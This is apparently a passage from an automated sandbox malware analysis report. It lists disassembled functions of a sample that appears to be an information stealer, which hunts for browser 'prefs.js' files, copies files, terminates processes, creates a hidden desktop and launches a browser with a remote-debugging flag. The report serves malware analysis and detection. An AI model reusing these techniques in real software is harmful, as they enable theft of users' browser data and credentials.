                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524B7F
                          • lstrlen.KERNEL32(00544CA8), ref: 00524B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BA7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 00524BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00524BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: dceacbf57353ce23c03e44a841c6dec4abd89126e30f9fe320f9b93f5fc726b5
                          • Instruction ID: 5f941b5b87a72af65fd89e61f2a89756bf7ca57dd5a3a1670d6ef0fbbdfc29bd
                          • Opcode Fuzzy Hash: dceacbf57353ce23c03e44a841c6dec4abd89126e30f9fe320f9b93f5fc726b5
                          • Instruction Fuzzy Hash: 67925074A016168FDB24CF29E948B6ABBE5BF46714F19C06DE8099B3A1E735DC81CF40
                          Function 00521250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00521291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005212BF
                          • lstrlen.KERNEL32(00544CA8), ref: 005212CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212E7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 005212F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0052133A
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052135C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00521376
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005213AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 005213D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005213E2
                          • lstrlen.KERNEL32(00541794), ref: 005213ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052140A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521416
                          • lstrlen.KERNEL32(?), ref: 00521423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521443
                          • lstrcat.KERNEL32(00000000,?), ref: 00521451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052147A
                          • StrCmpCA.SHLWAPI(?,011ACF80), ref: 005214A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 005214E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521535
                          • StrCmpCA.SHLWAPI(?,011AD1C8), ref: 00521552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521593
                          • lstrcpy.KERNEL32(00000000,?), ref: 005215BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005215E4
                          • StrCmpCA.SHLWAPI(?,011AD058), ref: 00521602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521685
                          • StrCmpCA.SHLWAPI(?,011ACFE0), ref: 005216B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 005216F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005217BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 005217F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052181C
                          • FindClose.KERNEL32(00000000), ref: 0052182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: b88f0d652974a7ea6109ca33a0c7ca6e9cb058a8dc4db6c2a09e934e1779f461
                          • Instruction ID: 81661e0330c48ba8895272380f2809cd2a54bd338346b6dbff02ba2b3116d88e
                          • Opcode Fuzzy Hash: b88f0d652974a7ea6109ca33a0c7ca6e9cb058a8dc4db6c2a09e934e1779f461
                          • Instruction Fuzzy Hash: 6712C375A106179BDB24EF78E889AAF7FB9BF95300F044528F846D3290DB34DC858B94
                          Function 0052CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0052CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052CC13
                          • lstrcat.KERNEL32(?,?), ref: 0052CC5F
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052CC71
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052CC8B
                          • wsprintfA.USER32 ref: 0052CCB0
                          • PathMatchSpecA.SHLWAPI(?,011A8AE0), ref: 0052CCE2
                          • CoInitialize.OLE32(00000000), ref: 0052CCEE
                            • Part of subcall function 0052CAE0: CoCreateInstance.COMBASE(0053B110,00000000,00000001,0053B100,?), ref: 0052CB06
                            • Part of subcall function 0052CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0052CB46
                            • Part of subcall function 0052CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0052CBC9
                          • CoUninitialize.COMBASE ref: 0052CD09
                          • lstrcat.KERNEL32(?,?), ref: 0052CD2E
                          • lstrlen.KERNEL32(?), ref: 0052CD3B
                          • StrCmpCA.SHLWAPI(?,0053CFEC), ref: 0052CD55
                          • wsprintfA.USER32 ref: 0052CD7D
                          • wsprintfA.USER32 ref: 0052CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0052CDB0
                          • wsprintfA.USER32 ref: 0052CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0052CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0052CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0052CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0052CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0052CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0052CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0052CF8D
                          • FindClose.KERNEL32(?), ref: 0052CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 944e33e6644387529837b42c55ebb10fb2cce77119f93c738b71a79cc45f97aa
                          • Instruction ID: 0f82a8b86bcccc0c9553fee49c241cfac5810b07f50734fc1f2a1597dc9d3ac2
                          • Opcode Fuzzy Hash: 944e33e6644387529837b42c55ebb10fb2cce77119f93c738b71a79cc45f97aa
                          • Instruction Fuzzy Hash: 75C193759002199FDB60DF64DC49EEE7B79BF85300F008599F909A7291EB34AE84CFA1
                          Function 00519770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00519790
                          • lstrcat.KERNEL32(?,?), ref: 005197A0
                          • lstrcat.KERNEL32(?,?), ref: 005197B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 005197C3
                          • memset.MSVCRT ref: 005197D7
                            • Part of subcall function 00533E70: lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00533EA5
                            • Part of subcall function 00533E70: lstrcpy.KERNEL32(00000000,011A9DA8), ref: 00533ECF
                            • Part of subcall function 00533E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0051134E,?,0000001A), ref: 00533ED9
                          • wsprintfA.USER32 ref: 00519806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00519827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00519844
                            • Part of subcall function 005346A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005346B9
                            • Part of subcall function 005346A0: Process32First.KERNEL32(00000000,00000128), ref: 005346C9
                            • Part of subcall function 005346A0: Process32Next.KERNEL32(00000000,00000128), ref: 005346DB
                            • Part of subcall function 005346A0: StrCmpCA.SHLWAPI(?,?), ref: 005346ED
                            • Part of subcall function 005346A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00534702
                            • Part of subcall function 005346A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00534711
                            • Part of subcall function 005346A0: CloseHandle.KERNEL32(00000000), ref: 00534718
                            • Part of subcall function 005346A0: Process32Next.KERNEL32(00000000,00000128), ref: 00534726
                            • Part of subcall function 005346A0: CloseHandle.KERNEL32(00000000), ref: 00534731
                          • memset.MSVCRT ref: 00519862
                          • lstrcat.KERNEL32(00000000,?), ref: 00519878
                          • lstrcat.KERNEL32(00000000,?), ref: 00519889
                          • lstrcat.KERNEL32(00000000,00544B60), ref: 0051989B
                          • memset.MSVCRT ref: 005198AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005198D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00519903
                          • StrStrA.SHLWAPI(00000000,011ADCD8), ref: 00519919
                          • lstrcpyn.KERNEL32(007493D0,00000000,00000000), ref: 00519938
                          • lstrlen.KERNEL32(?), ref: 0051994B
                          • wsprintfA.USER32 ref: 0051995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00519971
                          • memset.MSVCRT ref: 00519986
                          • Sleep.KERNEL32(00001388), ref: 005199E7
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 005192E1
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 005192FA
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 00519399
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 005193E6
                            • Part of subcall function 00534740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00534759
                            • Part of subcall function 00534740: Process32First.KERNEL32(00000000,00000128), ref: 00534769
                            • Part of subcall function 00534740: Process32Next.KERNEL32(00000000,00000128), ref: 0053477B
                            • Part of subcall function 00534740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053479C
                            • Part of subcall function 00534740: TerminateProcess.KERNEL32(00000000,00000000), ref: 005347AB
                            • Part of subcall function 00534740: CloseHandle.KERNEL32(00000000), ref: 005347B2
                            • Part of subcall function 00534740: Process32Next.KERNEL32(00000000,00000128), ref: 005347C0
                            • Part of subcall function 00534740: CloseHandle.KERNEL32(00000000), ref: 005347CB
                          • CloseDesktop.USER32(?), ref: 00519A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 2040986984-1862457068
                          • Opcode ID: 554aa665f2945fae2f0b6899b231ed031c0c10029ebd58089d5f6e86c632358f
                          • Instruction ID: 3e47c34e59ca701ba9840b9634a3388e81400df048141994e08370ce230efe92
                          • Opcode Fuzzy Hash: 554aa665f2945fae2f0b6899b231ed031c0c10029ebd58089d5f6e86c632358f
                          • Instruction Fuzzy Hash: 309175B5940209ABEB10DF64DC89FDE7BB9FF44700F108195F609A7191DB74AA848FA4
                          Function 00521269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00521291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005212BF
                          • lstrlen.KERNEL32(00544CA8), ref: 005212CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212E7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 005212F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0052133A
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052135C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00521376
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005213AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 005213D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005213E2
                          • lstrlen.KERNEL32(00541794), ref: 005213ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052140A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521416
                          • lstrlen.KERNEL32(?), ref: 00521423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521443
                          • lstrcat.KERNEL32(00000000,?), ref: 00521451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052147A
                          • StrCmpCA.SHLWAPI(?,011ACF80), ref: 005214A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 005214E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521535
                          • StrCmpCA.SHLWAPI(?,011AD1C8), ref: 00521552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521593
                          • lstrcpy.KERNEL32(00000000,?), ref: 005215BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005215E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005217BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 005217F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052181C
                          • FindClose.KERNEL32(00000000), ref: 0052182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 0ff52aafaf70e4279d2083b27cfdfed9460739fe4110f1bcfb24c7edf7bc84dc
                          • Instruction ID: cf589c62228546b2e9856b2513a931c496dab8dace5516af4eade9e027dc41ca
                          • Opcode Fuzzy Hash: 0ff52aafaf70e4279d2083b27cfdfed9460739fe4110f1bcfb24c7edf7bc84dc
                          • Instruction Fuzzy Hash: 26C1723591061A9BDB21EF74EC89AEF7FB9BF52700F044429F84693291DB34DC858B94
                          Function 0052E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0052E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052E243
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052E263
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052E27D
                          • wsprintfA.USER32 ref: 0052E2A2
                          • StrCmpCA.SHLWAPI(?,0053CFEC), ref: 0052E2B4
                          • wsprintfA.USER32 ref: 0052E2D1
                            • Part of subcall function 0052EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0052EE12
                          • wsprintfA.USER32 ref: 0052E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0052E304
                          • lstrcat.KERNEL32(?,011AE4B8), ref: 0052E335
                          • lstrcat.KERNEL32(?,00541794), ref: 0052E347
                          • lstrcat.KERNEL32(?,?), ref: 0052E358
                          • lstrcat.KERNEL32(?,00541794), ref: 0052E36A
                          • lstrcat.KERNEL32(?,?), ref: 0052E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0052E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E422
                          • DeleteFileA.KERNEL32(?), ref: 0052E45C
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052E49B
                          • FindClose.KERNEL32(00000000), ref: 0052E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 82d4a28e0e46f16ea14f3c51efffe6cb8454e532c5fbe9d81fc508ef6c3c4e69
                          • Instruction ID: e8de5bdf042283fa765c2051c51314cfa6178af9af8fd5a302e1e5649d615a3f
                          • Opcode Fuzzy Hash: 82d4a28e0e46f16ea14f3c51efffe6cb8454e532c5fbe9d81fc508ef6c3c4e69
                          • Instruction Fuzzy Hash: 7281957590021D9BDB20EF74EC49EEF7B79BF85300F008999B50A93191DB74AA98CF94
                          Function 005116B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005116E2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051176C
                          • lstrcat.KERNEL32(00000000), ref: 00511776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005117A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 005118F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005118FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
